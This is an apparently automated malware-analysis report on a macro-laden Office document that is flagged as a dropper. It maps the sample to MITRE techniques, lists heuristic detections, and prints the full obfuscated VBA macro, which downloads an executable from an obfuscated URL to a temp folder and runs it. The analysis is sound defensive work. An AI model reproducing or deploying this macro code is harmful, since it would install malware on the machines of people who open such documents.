Verdict: MALICIOUS
Risk Score: 162

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample contains VBA macros that are configured to execute automatically upon opening the document. The script attempts to download a payload from the obfuscated URL 'AhtXXtNpN:/NA/lNaNAwXmXaAtTe.XTcoNmA.XNauNN/XmXeNdXiTa/NdXoXcNuNmXTenTXtN.eXxXeT' and execute it. This behavior is indicative of downloader or dropper malware.
Heuristics (5)
- ClamAV: Doc.Dropper.Agent-6425751-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6425751-0
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1892 bytes |

SHA-256 (macros.bas): 9acf4e22fe17b167d5f07ad608ee7dd17219a5d4d1f130e6c0378198999d8f2c
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "PIJUupnl"
Private Sub CaRIMuS(ByVal FfppmDZgoM As String)
bjSiit.hgbaqVAKm VtvPtzpL.WkzoLVUm, vqJJuWW.uCEIbxdxuK("BEixBecX", "B5XiJ"), FfppmDZgoM
End Sub
Private Sub nBErXsfyN(ByVal HOCYEItn As String, ByVal TQHBVkqqOj As String)
Set slicjDsKI = VtvPtzpL.trKHrrHdmg
slicjDsKI.Open vqJJuWW.uCEIbxdxuK("gGEiTi", "Mhgi"), HOCYEItn, False
bjSiit.ozbcEmC slicjDsKI, vqJJuWW.uCEIbxdxuK("FSewnadF", "WwFa")
GSxSJ TQHBVkqqOj, bjSiit.LjYhV(slicjDsKI, vqJJuWW.uCEIbxdxuK("iRefsffp/onEsEe/fBiodfyO", "3E/fOi"))
End Sub
Private Function ekMDRtX() As String
ekMDRtX = vqJJuWW.uCEIbxdxuK("AhtXXtNpN:/NA/lNaNAwXmXaAtTe.XTcoNmA.XNauNN/XmXeNdXiTa/NdXoXcNuNmXTenTXtN.eXxXeT", "TANX")
End Function
Public Sub rezAR()
xLnNsVsYCm
End Sub
Private Sub GSxSJ(ByVal TQHBVkqqOj As String, ByVal FDzxWTzaZc As Variant)
Set KMpjbdauI = VtvPtzpL.iOxSJWxSk
bjSiit.EvaBIWj KMpjbdauI, vqJJuWW.uCEIbxdxuK("TsHypPPe", "HdsP"), 1
bjSiit.ozbcEmC KMpjbdauI, vqJJuWW.uCEIbxdxuK("IOpzeIn9", "9Iz")
bjSiit.hgbaqVAKm KMpjbdauI, vqJJuWW.uCEIbxdxuK("WMnrQinteM", "nQM"), FDzxWTzaZc
bjSiit.WDwXs KMpjbdauI, vqJJuWW.uCEIbxdxuK("5Sanvne52ToVFVniVle2", "5Vn2"), TQHBVkqqOj, 2
bjSiit.ozbcEmC KMpjbdauI, vqJJuWW.uCEIbxdxuK("CZFlyosyeZ", "yFZ")
End Sub
Private Sub xLnNsVsYCm()
On Error GoTo onCTXsy
nBErXsfyN ekMDRtX, vlwLDCzR
CaRIMuS vlwLDCzR
Exit Sub
onCTXsy:
End Sub
Private Function NibRHUH(ByVal TnEfUs As String) As String
Set iutFHvNFRt = bjSiit.xoyJFqpa(VtvPtzpL.WkzoLVUm, vqJJuWW.uCEIbxdxuK("ExWnvBRirWBonBmRxexnRt", "BxRW"), vqJJuWW.uCEIbxdxuK("Pq RkOC ESkqS", "Yqwk "))
NibRHUH = iutFHvNFRt(TnEfUs)
End Function
Private Function vlwLDCzR() As String
vlwLDCzR = NibRHUH(vqJJuWW.uCEIbxdxuK("TXZEwMXP", "ZXw")) & qhQxUWxSR
End Function
Private Function qhQxUWxSR() As String
qhQxUWxSR = vqJJuWW.uCEIbxdxuK("/DcJaDD5nfN9bJD9en1nJ3aJaND7nc.NenJxen", "JDnN")
End Function
```